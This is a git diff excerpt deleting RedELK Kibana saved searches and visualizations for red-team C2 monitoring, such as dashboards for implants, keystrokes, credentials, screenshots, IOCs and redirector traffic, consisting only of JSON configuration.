"id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 209 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "infra.attack_scenario", - "host.name", - "user.name", - "file.directory", - "file.name", - "file.url" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": false, - "params": { - "query": "downloads", - "type": "phrase" - }, - "type": "phrase", - "value": "downloads" - }, - "query": { - "match": { - "c2.log.type": { - "query": "downloads", - "type": "phrase" - } - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - C2 Downloads", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 212 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "infra.attack_scenario", - "host.name", - "user.name", - "c2.message", - "keystrokes.url" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": false, - "params": { - "query": "keystrokes" - }, - "type": "phrase" - }, - "query": { - "match": { - "c2.log.type": { - "query": "keystrokes", - "type": "phrase" - } - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - C2 Keystrokes", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 215 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "creds.realm", - "creds.username", - "creds.credential", - "creds.host", - "creds.source" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - C2 Credentials", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "3fabe620-6c38-11ea-97d6-55783aed877a", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "credentials", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 217 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "infra.attack_scenario", - "user.name", - "host.name", - "ioc.type", - "file.hash.md5", - "file.name", - "file.size", - "ioc.domain" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": false, - "params": { - "query": "ioc" - }, - "type": "phrase" - }, - "query": { - "match": { - "c2.log.type": { - "query": "ioc", - "type": "phrase" - } - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - C2 IOCs", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 220 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "module.name", - "module.type", - "module.last_run.timestamp", - "module.last_run.status", - "module.last_run.count", - "module.last_run.message" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "exists": { - "field": "module.name" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "module.name", - "negate": false, - "type": "exists", - "value": "exists" - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [], - "title": "RedELK - Modules status", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "654f76a0-9269-11eb-a753-9da683898c26", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 223 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "infra.attack_scenario", - "redir.backend.name", - "source.ip", - "source.domain", - "source.geo.as.organization.name", - "source.geo.country_iso_code", - "http.request.body.content" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "tags:alarm_*" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - Redirector Traffic - Alarmed", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "redirtraffic", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 225 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "implant.id", - "infra.attack_scenario", - "host.name", - "user.name", - "host.ip_int", - "host.ip_ext", - "implant.arch", - "host.os.name", - "host.os.version", - "host.os.kernel", - "implant.parent_id", - "host.geo.as.organization.name", - "host.geo.country_iso_code" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - C2 implants overview", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "implantsdb", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 227 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "iplist.name", - "iplist.source", - "iplist.ip" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [], - "title": "RedELK - IP Lists", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "87530b40-9269-11eb-a753-9da683898c26", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "789bb360-2ab1-11eb-bc47-53169c986c81", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 229 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "bluechecktype", - "message" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - BlueCheck", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "a4757c90-ce50-11ea-a580-918d4757c08d", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "bluecheck", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1643015939090, - 281 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "attackscenario", - "from", - "to", - "subject", - "emailfolder" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [], - "title": "RedELK - Emails", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "email", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 231 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "user.name", - "host.name", - "c2.message", - "threat.technique.id" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": false, - "params": { - "query": "implant_task" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "implant_task" - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [], - "title": "RedELK - C2 Tasks", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "cc523820-d021-11ea-9301-a30a04251ae9", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 234 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "c2.message", - "host.name", - "user.name", - "implant.id" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.module", - "negate": false, - "params": { - "query": "redelk" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.module": "redelk" - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [], - "title": "RedELK - Signals", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 237 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "infra.attack_scenario", - "host.name", - "user.name", - "screenshot.full", - "screenshot.thumb" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": false, - "params": { - "query": "screenshots" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "screenshots" - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - C2 Screenshots", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 240 - ], - "type": "search", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_visualization.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_visualization.json deleted file mode 100644 index 7b198e16..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_visualization.json +++ /dev/null @@ -1,5064 +0,0 @@ -[ - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - IOC over time", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-12M", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - }, - { - "enabled": true, - "id": "3", - "params": { - "customLabel": "IOC Type", - "field": "ioc.type", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 10 - }, - "schema": "group", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": { - "show": false - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Count" - }, - "drawLinesBetweenPoints": true, - "lineWidth": 2, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Count" - }, - "type": "value" - } - ] - }, - "title": "RedELK - IOC over time", - "type": "histogram" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 99 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Screenshots over time", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Screenshots" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-30d", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": { - "show": false - }, - "legendPosition": "top", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Screenshots" - }, - "drawLinesBetweenPoints": true, - "lineWidth": 2, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Screenshots" - }, - "type": "value" - } - ] - }, - "title": "RedELK - Screenshots over time", - "type": "histogram" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 101 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "title": "RedELK - Dashboard links internal", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [], - "params": { - "fontSize": 12, - "markdown": "**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)", - "openLinksInNewTab": false - }, - "title": "RedELK - Dashboard links internal", - "type": "markdown" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [], - "sort": [ - 1642171875895, - 102 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": false, - "params": { - "query": "implant_newimplant" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "implant_newimplant" - } - } - } - ], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - } - } - }, - "title": "RedELK - Top computers with new implants", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Amount of implants" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "Hostname", - "field": "host.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 17 - }, - "schema": "segment", - "type": "terms" - }, - { - "enabled": true, - "id": "3", - "params": { - "customLabel": "Username", - "field": "user.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 10 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTooltip": true, - "distinctColors": true, - "isDonut": true, - "labels": { - "last_level": true, - "show": false, - "truncate": 100, - "values": true - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "type": "pie" - }, - "title": "RedELK - Top computers with new implants", - "type": "pie" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 105 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "NOT (redir.backend.name: c2*)" - } - } - }, - "title": "RedELK - Redirector Traffic - Decoy", - "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Source IP", - "field": "source.ip" - }, - "schema": "metric", - "type": "cardinality" - }, - { - "enabled": true, - "id": "2", - "params": { - "autoPrecision": true, - "customLabel": "", - "field": "source.geo.location", - "isFilteredByCollar": true, - "precision": 2, - "useGeocentroid": true - }, - "schema": "segment", - "type": "geohash_grid" - } - ], - "params": { - "addTooltip": true, - "colorSchema": "Yellow to Red", - "heatClusterSize": 1.5, - "isDesaturated": true, - "legendPosition": "bottomright", - "mapCenter": [ - 0, - 0 - ], - "mapType": "Heatmap", - "mapZoom": 2, - "wms": { - "baseLayersAreLoaded": {}, - "enabled": false, - "options": { - "format": "image/png", - "transparent": true - }, - "selectedTmsLayer": { - "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", - "id": "road_map", - "maxZoom": 18, - "minZoom": 0, - "subdomains": [], - "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" - }, - "tmsLayers": [ - { - "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", - "id": "road_map", - "maxZoom": 18, - "minZoom": 0, - "subdomains": [], - "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" - } - ] - } - }, - "title": "RedELK - Redirector Traffic - Decoy", - "type": "tile_map" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "redirtraffic", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 107 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "(redir.backend.name: c2*)" - } - } - }, - "title": "RedELK - Redirector Traffic - C2", - "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Source IP", - "field": "source.ip" - }, - "schema": "metric", - "type": "cardinality" - }, - { - "enabled": true, - "id": "2", - "params": { - "autoPrecision": true, - "customLabel": "", - "field": "source.geo.location", - "isFilteredByCollar": true, - "precision": 2, - "useGeocentroid": true - }, - "schema": "segment", - "type": "geohash_grid" - } - ], - "params": { - "addTooltip": true, - "colorSchema": "Yellow to Red", - "heatClusterSize": 1.5, - "isDesaturated": true, - "legendPosition": "bottomright", - "mapCenter": [ - 0, - 0 - ], - "mapType": "Heatmap", - "mapZoom": 2, - "wms": { - "baseLayersAreLoaded": {}, - "enabled": false, - "options": { - "format": "image/png", - "transparent": true - }, - "selectedTmsLayer": { - "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", - "id": "road_map", - "maxZoom": 18, - "minZoom": 0, - "subdomains": [], - "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" - }, - "tmsLayers": [ - { - "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", - "id": "road_map", - "maxZoom": 18, - "minZoom": 0, - "subdomains": [], - "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" - } - ] - } - }, - "title": "RedELK - Redirector Traffic - C2", - "type": "tile_map" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "redirtraffic", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 109 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - IP Lists metrics", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "IPs" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "iplist.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 30 - }, - "schema": "group", - "type": "terms" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - IP Lists metrics", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "20fac240-926c-11eb-a753-9da683898c26", - 